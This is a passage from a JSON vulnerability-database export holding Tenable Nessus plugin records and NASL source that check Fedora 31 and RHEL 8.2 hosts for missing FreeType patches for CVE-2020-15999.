additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-09T00:00:00", "type": "nessus", "title": "Fedora 31 : freetype (2020-6b35849edd)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:freetype", "cpe:/o:fedoraproject:fedora:31"], "id": "FEDORA_2020-6B35849EDD.NASL", "href": "https://www.tenable.com/plugins/nessus/142621", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-6b35849edd.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142621);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"FEDORA\", value:\"2020-6b35849edd\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Fedora 31 : freetype (2020-6b35849edd)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fix for CVE-2020-15999.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-6b35849edd\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected freetype package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:31\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^31([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 31\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC31\", reference:\"freetype-2.10.0-4.fc31\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"freetype\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:41:06", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4951 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-05T00:00:00", "type": "nessus", "title": "RHEL 8 : freetype (RHSA-2020:4951)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:rhel_aus:8.2", "cpe:/o:redhat:rhel_e4s:8.2", "cpe:/o:redhat:rhel_eus:8.2", "cpe:/o:redhat:rhel_tus:8.2", "p-cpe:/a:redhat:enterprise_linux:freetype", "p-cpe:/a:redhat:enterprise_linux:freetype-devel"], "id": "REDHAT-RHSA-2020-4951.NASL", "href": "https://www.tenable.com/plugins/nessus/142478", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4951. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142478);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4951\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 8 : freetype (RHSA-2020:4951)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4951 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4951\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_aus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_tus:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.2')) audit(AUDIT_OS_NOT, 'Red Hat 8.2', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'rhel_aus_8_2_appstream': [\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-aus-rpms',\n 'rhel-8-for-x86_64-appstream-aus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms__8_DOT_2'\n ],\n 'rhel_aus_8_2_baseos': [\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-aus-rpms',\n 'rhel-8-for-x86_64-baseos-aus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms__8_DOT_2'\n ],\n 'rhel_e4s_8_2_appstream': [\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms__8_DOT_2'\n ],\n 'rhel_e4s_8_2_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_2'\n ],\n 'rhel_e4s_8_2_highavailability': [\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms__8_DOT_2'\n ],\n 'rhel_e4s_8_2_sap': [\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms__8_DOT_2'\n ],\n 'rhel_e4s_8_2_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms__8_DOT_2'\n ],\n 'rhel_eus_8_2_appstream': [\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms',\n 'rhel-8-for-aarch64-appstream-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-appstream-eus-rpms',\n 'rhel-8-for-aarch64-appstream-eus-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms',\n 'rhel-8-for-aarch64-appstream-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms',\n 'rhel-8-for-s390x-appstream-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-s390x-appstream-eus-rpms',\n 'rhel-8-for-s390x-appstream-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-appstream-eus-source-rpms',\n 'rhel-8-for-s390x-appstream-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-aus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-aus-rpms',\n 'rhel-8-for-x86_64-appstream-aus-source-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-debug-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-rpms',\n 'rhel-8-for-x86_64-appstream-e4s-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-eus-rpms',\n 'rhel-8-for-x86_64-appstream-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms',\n 'rhel-8-for-x86_64-appstream-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-tus-rpms',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms'\n ],\n 'rhel_eus_8_2_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-aus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-aus-rpms',\n 'rhel-8-for-x86_64-baseos-aus-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-tus-rpms',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms'\n ],\n 'rhel_eus_8_2_crb': [\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-debug-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-aarch64-eus-source-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-debug-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms',\n 'codeready-builder-for-rhel-8-s390x-eus-source-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-debug-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-rpms__8_DOT_2',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms',\n 'codeready-builder-for-rhel-8-x86_64-eus-source-rpms__8_DOT_2'\n ],\n 'rhel_eus_8_2_highavailability': [\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-highavailability-eus-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms',\n 'rhel-8-for-aarch64-highavailability-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms',\n 'rhel-8-for-s390x-highavailability-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-s390x-highavailability-eus-rpms',\n 'rhel-8-for-s390x-highavailability-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms',\n 'rhel-8-for-s390x-highavailability-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-e4s-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-rpms',\n 'rhel-8-for-x86_64-highavailability-e4s-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-eus-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms'\n ],\n 'rhel_eus_8_2_resilientstorage': [\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms',\n 'rhel-8-for-s390x-resilientstorage-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms',\n 'rhel-8-for-x86_64-resilientstorage-eus-source-rpms__8_DOT_2'\n ],\n 'rhel_eus_8_2_sap': [\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-s390x-sap-netweaver-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-netweaver-eus-source-rpms__8_DOT_2'\n ],\n 'rhel_eus_8_2_sap_hana': [\n 'rhel-8-for-x86_64-sap-solutions-e4s-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-rpms',\n 'rhel-8-for-x86_64-sap-solutions-e4s-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms',\n 'rhel-8-for-x86_64-sap-solutions-eus-source-rpms__8_DOT_2'\n ],\n 'rhel_eus_8_2_supplementary': [\n 'rhel-8-for-aarch64-supplementary-eus-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-rpms__8_DOT_2',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms',\n 'rhel-8-for-aarch64-supplementary-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-s390x-supplementary-eus-rpms',\n 'rhel-8-for-s390x-supplementary-eus-rpms__8_DOT_2',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms',\n 'rhel-8-for-s390x-supplementary-eus-source-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-supplementary-eus-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms',\n 'rhel-8-for-x86_64-supplementary-eus-source-rpms__8_DOT_2'\n ],\n 'rhel_extras_nfv_8': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-nfv-tus-debug-rpms',\n 'rhel-8-for-x86_64-nfv-tus-rpms',\n 'rhel-8-for-x86_64-nfv-tus-source-rpms'\n ],\n 'rhel_extras_rt_8': [\n 'rhel-8-for-x86_64-nfv-debug-rpms',\n 'rhel-8-for-x86_64-nfv-rpms',\n 'rhel-8-for-x86_64-nfv-source-rpms',\n 'rhel-8-for-x86_64-rt-debug-rpms',\n 'rhel-8-for-x86_64-rt-rpms',\n 'rhel-8-for-x86_64-rt-source-rpms',\n 'rhel-8-for-x86_64-rt-tus-debug-rpms',\n 'rhel-8-for-x86_64-rt-tus-rpms',\n 'rhel-8-for-x86_64-rt-tus-source-rpms'\n ],\n 'rhel_tus_8_2_appstream': [\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms',\n 'rhel-8-for-x86_64-appstream-tus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-tus-rpms',\n 'rhel-8-for-x86_64-appstream-tus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms',\n 'rhel-8-for-x86_64-appstream-tus-source-rpms__8_DOT_2'\n ],\n 'rhel_tus_8_2_baseos': [\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-tus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-tus-rpms',\n 'rhel-8-for-x86_64-baseos-tus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms',\n 'rhel-8-for-x86_64-baseos-tus-source-rpms__8_DOT_2'\n ],\n 'rhel_tus_8_2_highavailability': [\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-debug-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-tus-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-rpms__8_DOT_2',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms',\n 'rhel-8-for-x86_64-highavailability-tus-source-rpms__8_DOT_2'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'freetype-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 'rhel_eus_8_2_sap_hana', 'rhel_eus_8_2_supplementary', 'rhel_extras_nfv_8', 'rhel_extras_rt_8', 'rhel_tus_8_2_appstream', 'rhel_tus_8_2_baseos', 'rhel_tus_8_2_highavailability']},\n {'reference':'freetype-2.9.1-4.el8_2.1', 'sp':'2', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_aus_8_2_appstream', 'rhel_aus_8_2_baseos', 'rhel_e4s_8_2_appstream', 'rhel_e4s_8_2_baseos', 'rhel_e4s_8_2_highavailability', 'rhel_e4s_8_2_sap', 'rhel_e4s_8_2_sap_hana', 'rhel_eus_8_2_appstream', 'rhel_eus_8_2_baseos', 'rhel_eus_8_2_crb', 'rhel_eus_8_2_highavailability', 'rhel_eus_8_2_resilientstorage', 'rhel_eus_8_2_sap', 